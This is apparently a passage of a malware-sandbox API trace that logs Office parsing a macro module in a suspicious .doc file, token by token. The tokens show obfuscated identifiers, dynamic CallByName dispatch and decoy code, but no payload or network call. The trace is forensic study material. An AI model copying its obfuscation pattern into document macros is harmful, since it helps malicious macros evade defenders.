lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module2", lpUsedDefaultChar=0x0) returned 8 [0030.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.255] GetLocalTime (in: lpSystemTime=0x2e6218 | out: lpSystemTime=0x2e6218*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x91)) [0030.255] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c69ac, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="075b6852dd", cchWideChar=11, lpMultiByteStr=0x2e61b0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="075b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.255] strcpy_s (in: _Dst=0x78013e0, _DstSize=0x8, _Src="Module2" | out: _Dst="Module2") returned 0x0 [0030.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.255] wcscpy_s (in: _Destination=0xb4c69c0, _SizeInWords=0x8, _Source="Module2" | out: _Destination="Module2") returned 0x0 [0030.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.255] wcscpy_s (in: _Destination=0xb4c69d0, _SizeInWords=0x8, _Source="Module2" | out: _Destination="Module2") returned 0x0 [0030.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x9c) returned 0xb4c70d0 [0030.255] IMalloc:Free (This=0x7fefe015380, pv=0x765aca0) [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76686d0 [0030.255] IMalloc:Free (This=0x7fefe015380, pv=0xb4c70d0) [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb523e60 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76686d0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490510 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78381a0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60c0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60a0 [0030.255] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.255] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.255] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.255] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.255] CExposedDocFile::AddRef () returned 0x9 [0030.255] CExposedDocFile::AddRef () returned 0xa [0030.255] CExposedDocFile::OpenStream () returned 0x0 [0030.255] CExposedDocFile::Release () returned 0x9 [0030.255] CExposedStream::Seek () returned 0x0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb528d10 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838230 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb5293a0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668430 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60e0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f60f0 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668400 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78382c0 [0030.255] CExposedStream::AddRef () returned 0x2 [0030.255] CExposedStream::Read () returned 0x0 [0030.255] CExposedStream::AddRef () returned 0x3 [0030.255] CExposedStream::Release () returned 0x2 [0030.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb5299f0 [0030.256] CExposedStream::Read () returned 0x0 [0030.256] CExposedStream::Read () returned 0x0 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f6100 [0030.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490530 [0030.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f6100, cbMultiByte=8, lpWideCharStr=0xb490530, cchWideChar=8 | out: lpWideCharStr="Module2") returned 8 [0030.256] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6100) [0030.256] IMalloc:Free (This=0x7fefe015380, pv=0xb490530) [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stocke") returned 0x109ec9 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_Project") returned 0x100acd [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VertikName") returned 0x10288c [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CofeeShop") returned 0x10ac6a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_VEAM") returned 0x100bf6 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_Fish") returned 0x10c952 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AlertN") returned 0x100fb3 [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.256] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AlertNE") returned 0x105c56 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_PokerFace") returned 0x10fd2f [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_aifde") returned 0x10e31d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_FLAME") returned 0x10f44a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_avatar") returned 0x107f55 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MarkusPils") returned 0x102804 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_4") returned 0x102406 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_System") returned 0x106c7c [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SubProperty") returned 0x109bbc [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="smbi") returned 0x100d9f [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_2") returned 0x102404 [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.257] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Quubo") returned 0x101120 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ShugarMilk") returned 0x106370 [0030.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51aba, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0030.258] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51aba, cbMultiByte=10, lpWideCharStr=0x766cf98, cchWideChar=10 | out: lpWideCharStr="ShugarMilk") returned 10 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.258] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rx") returned 0x105f07 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ry") returned 0x105f04 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.258] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewX") returned 0x100975 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewY") returned 0x100972 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.258] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.258] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="D") returned 0x10105b [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SgnX") returned 0x10ef93 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SgnY") returned 0x10ef90 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioX") returned 0x10b0e3 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioY") returned 0x10b0e0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rx") returned 0x105f07 [0030.259] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Rx" | out: _Dst="Rx") returned 0x0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ry") returned 0x105f04 [0030.259] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Ry" | out: _Dst="Ry") returned 0x0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rytt") returned 0x10756e [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ToggleButton2") returned 0x10bc48 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Caption") returned 0x107810 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_4") returned 0x102406 [0030.259] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Bonez_Dadly_4" | out: _Dst="Bonez_Dadly_4") returned 0x0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZK") returned 0x106022 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Caption") returned 0x107810 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MarkusPils") returned 0x102804 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stocke") returned 0x109ec9 [0030.259] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="Stocke" | out: _Dst="Stocke") returned 0x0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stocke") returned 0x109ec9 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XIpotom2") returned 0x10aad6 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XIpotom2") returned 0x10aad6 [0030.259] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="XIpotom2" | out: _Dst="XIpotom2") returned 0x0 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.259] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.260] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="e" | out: _Dst="e") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XIpotom2") returned 0x10aad6 [0030.260] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="XIpotom2" | out: _Dst="XIpotom2") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Challenge") returned 0x106bdc [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CallByName") returned 0x1079f5 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CofeeShop") returned 0x10ac6a [0030.260] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CofeeShop" | out: _Dst="CofeeShop") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rytt") returned 0x10756e [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VbMethod") returned 0x10d6d4 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XIpotom2") returned 0x10aad6 [0030.260] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="XIpotom2" | out: _Dst="XIpotom2") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewX") returned 0x100975 [0030.260] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewX" | out: _Dst="NewX") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BallX") returned 0x10e49a [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewY") returned 0x100972 [0030.260] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewY" | out: _Dst="NewY") returned 0x0 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BallY") returned 0x10e497 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.260] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedY") returned 0x101cda [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedY") returned 0x101cda [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioY") returned 0x10b0e0 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedY") returned 0x101cda [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedY") returned 0x101cda [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioX") returned 